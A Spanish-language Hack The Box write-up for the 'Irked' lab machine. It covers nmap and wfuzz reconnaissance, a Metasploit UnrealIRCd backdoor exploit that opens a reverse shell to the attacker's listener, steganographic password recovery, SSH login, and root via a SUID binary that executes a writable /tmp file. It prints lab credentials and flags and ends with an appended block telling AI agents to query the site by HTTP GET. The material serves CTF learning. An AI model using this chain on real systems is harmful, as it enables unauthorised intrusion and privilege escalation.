## 1- Reconocimiento y escaneo
### `1.1 Ping`
```bash
PING 10.10.10.117 (10.10.10.117) 56(84) bytes of data.
64 bytes from 10.10.10.117: icmp_seq=1 ttl=63 time=171 ms
--- 10.10.10.117 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 170.883/170.883/170.883/0.000 ms
```
Podemos notar que se trata de una maquina Linux, debido al TTL:
```
TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)
```
### `1.2 Nmap`
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.117 -oN escaneo.txt
# Nmap 7.95 scan initiated Tue Feb 25 18:42:06 2025 as: /usr/lib/nmap/nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv -oN escaneo.txt 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up, received user-set (0.18s latency).
Scanned at 2025-02-25 18:42:07 -03 for 35s
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA==
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
| 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34788/udp status
| 100024 1 44738/tcp status
| 100024 1 56998/udp6 status
|_ 100024 1 58644/tcp6 status
6697/tcp open irc syn-ack ttl 63 UnrealIRCd
8067/tcp open irc syn-ack ttl 63 UnrealIRCd
44738/tcp open status syn-ack ttl 63 1 (RPC #100024)
65534/tcp open irc syn-ack ttl 63 UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 25 18:42:42 2025 -- 1 IP address (1 host up) scanned in 35.83 seconds
Vemos que esta corriendo el puerto 22(OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)) correspondiente a un servidor SSH, el puerto 80(Apache httpd 2.4.10 ((Debian)) correspondiente a un servidor web y vemos que tambien corre un servidor IRC correpsondientes a lso puertos "6697, 8067 y 65534"
Vemos tambien que el sistema operativo Linux que se encuentra corriendo en la maquina objetivo es un Debian
### `1.3 whatweb`
Para realizar el escaneo de tecnologÃas web, vamos a modificar el archivo hosts de la ruta "/etc/hosts" para que apunte al dominio "":
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# vim /etc/hosts
```
Editamos y quedarÃa asi:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 t0mz
# HACK THE BOX
10.10.11.182 photobomb.htb
10.10.10.117 irked.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```
```
IP 10.10.10.29 <--> irked.htb
```
De tal manera que cuando entramos al navegador, nos saldrá la siguiente pagina:
Ahora, vamos a realizar el escaneo de tecnologias web con "whatweb":
```
http://irked.htb/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[10.10.10.117]
```
Vemos tecnologias como:
```
Apache 2.4.10
OS: Debian Linux
```
### `1.4 Fuzzing`
En este caso el Fuzzing lo vamos a realizar con la herramienta "wfuzz" con el siguiente comando:
```bash
wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://irked.htb/FUZZ
```
Ejecutamos:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://irked.htb/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://irked.htb/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 3 L 7 W 72 Ch "# Copyright 2007 James Fisher"
000000014: 200 3 L 7 W 72 Ch "http://irked.htb/"
000000011: 200 3 L 7 W 72 Ch "# Priority ordered case sensative list, whe
re entries were found"
000000001: 200 3 L 7 W 72 Ch "# directory-list-2.3-medium.txt"
000000730: 301 9 L 28 W 307 Ch "manual"
000000004: 200 3 L 7 W 72 Ch "#"
000000002: 200 3 L 7 W 72 Ch "#"
000000005: 200 3 L 7 W 72 Ch "# This work is licensed under the Creative
Commons"
000000008: 200 3 L 7 W 72 Ch "# or send a letter to Creative Commons, 171
Second Street,"
000000006: 200 3 L 7 W 72 Ch "# Attribution-Share Alike 3.0 License. To v
iew a copy of this"
000000009: 200 3 L 7 W 72 Ch "# Suite 300, San Francisco, California, 941
05, USA."
000000012: 200 3 L 7 W 72 Ch "# on atleast 2 different hosts"
000000010: 200 3 L 7 W 72 Ch "#"
000000013: 200 3 L 7 W 72 Ch "#"
000000007: 200 3 L 7 W 72 Ch "# license, visit http://creativecommons.org
/licenses/by-sa/3.0/"
000045240: 200 3 L 7 W 72 Ch "http://irked.htb/"
000095524: 403 11 L 32 W 297 Ch "server-status"
Total time: 283.5176
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 777.9410
```
Dentro del fuzzing, no encontramos nada relevante
## 2- Explotación
### `2.1 UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit Framework)`
Vamos a irnos a Metasploit Framework:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# msfconsole -q
msf6 >
```
Y vamos a buscar exploits para el servicio "UnrealIRCd":
```bash
msf6 > search UnrealIRCd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 >
```
En este caso utilizaremos el exploit "exploit/unix/irc/unreal\_ircd\_3281\_backdoor" para obtener un backdoor:
```bash
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
```
Ahora vamos a configurar los parametros necesarios para la ejecución del exploit:
```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
RHOSTS => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.117 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 6697 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
```
(Por default el puerto viene definido como el 6667 en el exploit, en este caso la maquina corre el servidor IRC por el puerto 6697)
```bash
6697/tcp open irc syn-ack ttl 63 UnrealIRCd
```
Ahora vamos utilizar un payload, en mi caso utilizare el payload "payload/cmd/unix/reverse" para obtener una shell reversa:
```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
```
Y ahora configuraremos los parámetros del payload para su correcta funcionalidad:
```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.117 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
g-metasploit.html
RPORT 6697 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
```
(Recordar poner la IP de la VPN que nos asigna Hack The Box en la interfaz de red "tun0")
Ahora vamos a ejecutar el exploit:
```bash
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.10.14.12:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo augpopTkghLaeDKT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "augpopTkghLaeDKT\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.12:4444 -> 10.10.10.117:45615) at 2025-02-25 19:55:12 -0300
whoami
ircd
```
Ya tendremos acceso con usuario a la maquina, ahora restarÃa obtener un prompt con el comando "shell"
```bash
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
whoami
whoami
ircd
ircd@irked:~/Unreal3.2$
```
(Ejecutar un comando luego de ejecutar el comando "shell")
### `2.2 Usuario djmardov`
Para obtener la flag de usuario y de root, es necesario realizar la escalada de privilegios, de hecho el archivo "user.txt" se encuentra en la ruta "/home/djmardov/user.txt", pero no deja visualizarlo debido a la falta de permisos:
```bash
ircd@irked:/home/djmardov$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied
ircd@irked:/home/djmardov$
```
Ahora vamos a irnos al directorio "Documents" del usuario "djmardov":
```
ircd@irked:/home/djmardov$ cd /home/djmardov/Documents
cd /home/djmardov/Documents
ircd@irked:/home/djmardov/Documents$
```
Y listamos los directorios ocultos:
```bash
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 12
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
lrwxrwxrwx 1 root root 23 Sep 5 2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov/Documents$
```
Vemos un archivo llamado ".backup", vamos a visualizarlo con cat:
```bash
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$
```
Vemos una posible contraseña
```
UPupDOWNdownLRlrBAbaSSss
```
### `2.3 EsteganografÃa con la contraseña obtenida`
Ahora vamos a irnos a la pagina web de la maquina, donde podremos ver que hay una imagen, vamos a bajárnosla con el comando WGET, `"wget http://irked.htb/irked.jpg"`:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# wget http://irked.htb/irked.jpg
--2025-02-25 20:04:03-- http://irked.htb/irked.jpg
Resolviendo irked.htb (irked.htb)... 10.10.10.117
Conectando con irked.htb (irked.htb)[10.10.10.117]:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 34697 (34K) [image/jpeg]
Grabando a: «irked.jpg.1»
irked.jpg.1 100%[=====================================================>] 33,88K 195KB/s en 0,2s
2025-02-25 20:04:04 (195 KB/s) - «irked.jpg.1» guardado [34697/34697]
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─#
```
Ahora vamos a utilizar la herramienta "steghide" para extraer todos los archivos e información que se encuentran dentro de la imagen "irked.jpg", utilizando el siguiente comando:
```bash
steghide extract -sf irked.jpg
```
Esta herramienta no se encuentra instalada en Kali, para instalarla utilizamos el gestor de paquetes aptitude `"sudo apt install steghide"`
Ejecutamos el comando `steghide`:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# steghide extract -sf irked.jpg
Anotar salvoconducto:
```
Nos va a pedir que ingresemos una contraseña, que es la contraseña que habiamos obtenido anteriormente dentro del archivo ".backup", "UPupDOWNdownLRlrBAbaSSss", ingresamos la contraseña y listamos que nos extrajo de la imagen:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# steghide extract -sf irked.jpg
Anotar salvoconducto:
anot� los datos extra�dos e/"pass.txt".
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# ls
escaneo.txt irked.jpg irked.jpg.1 pass.txt ping.txt whatweb.txt
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─#
```
Nos extrajo un archivo de texto llamado "pass.txt", vamos a visualizarlo:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# cat pass.txt
Kab6h+m+bbp2J:HG
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─#
```
Nos da una contraseña, ahora vamos a logearnos por SSH con el usuario "djmardov" y la contraseña obtenida de la imagen:
```bash
┌──(root㉿t0mz)-[/home/kali/ctf/irked]
└─# ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$
```
### `2.4 Obtención de la flag de usuario`
Y ahora podremos obtener la flag de usuario, que se encuentra dentro del mismo directorio personal del usuario "djmardov":
```bash
djmardov@irked:~$ cat /home/djmardov/user.txt
97e5e938e3758bcb39bc1939ed2ec2aa
djmardov@irked:~$
```
## 3- Escalado de privilegios
### `3.1 Archivos con permisos SUID`
Para elevar privilegios, vamos a buscar archivo que contengan permisos SUID, basicamente realizar una busqueda de archivos que podamos ejecutar con el usuario "djmardov" como si fuesemos usuarios root, para eso utilizaremos el comando `"find"`, de la siguiente manera:
```bash
find / -perm -u=s -type f 2>/dev/null
```
(`2>/dev/null` para redirigir todos los errores al archivo `/dev/null`)
Ejecutamos:
```bash
djmardov@irked:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
```
Podremos ver un archivo raro llamado `"/usr/bin/viewuser"`, vamos a ver los permisos que contiene este ejecutable:
```bash
djmardov@irked:~$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
djmardov@irked:~$
```
Tenemos permisos de escritura, lectura y ejecución
Vamos a ejecutar el binario "viewuser":
```bash
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-02-25 16:40 (:0)
djmardov pts/1 2025-02-25 18:09 (10.10.14.12)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$
```
Vemos que al script, le falta el archivo "listusers" dentro del directorio "/tmp", vamos a crearlo y a darle permisos totales(777), en mi caso el comando que le pondre al archivo "listusers" es:
```bash
su -
```
Ahora vamos a crear el archivo "listusers" con el comando "echo" y vamos a visualizarlo:
```bash
djmardov@irked:/tmp$ echo 'su -' > listusers
djmardov@irked:/tmp$ ls
listusers
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-colord.service-1fYr0K
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-cups.service-0dxbOE
systemd-private-1b3b7135d63a4419ac45a44ce27b1474-rtkit-daemon.service-3KNNpa
vmware-root
djmardov@irked:/tmp$
```
Y vamos a darle permisos totales con el comando "chmod":
```bash
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$
```
Y ahora vamos a ejecutar el binario de "viewuser" que encontramos con permisos SUID:
```bash
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-02-25 16:40 (:0)
djmardov pts/1 2025-02-25 18:09 (10.10.14.12)
root@irked:~#
```
Ya somos usuarios root
### `3.2 Obtención de la flag root`
La flag de root se encuentra dentro del directorio `/root/root.txt`, vamos a visualizarla:
```bash
root@irked:~# cat /root/root.txt
b33261ed43e69aa9dd930fb8a853d423
root@irked:~#
```
Con esto, concluimos la maquina "Irked" de Hack The Box
Espero te haya sido de ayuda este Write Up :)
Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis [redes sociales](/writeup-ctf/mis-redes-sociales.md)
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://writeups-ctfs.gitbook.io/writeup-ctf/hack-the-box/irked-easy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.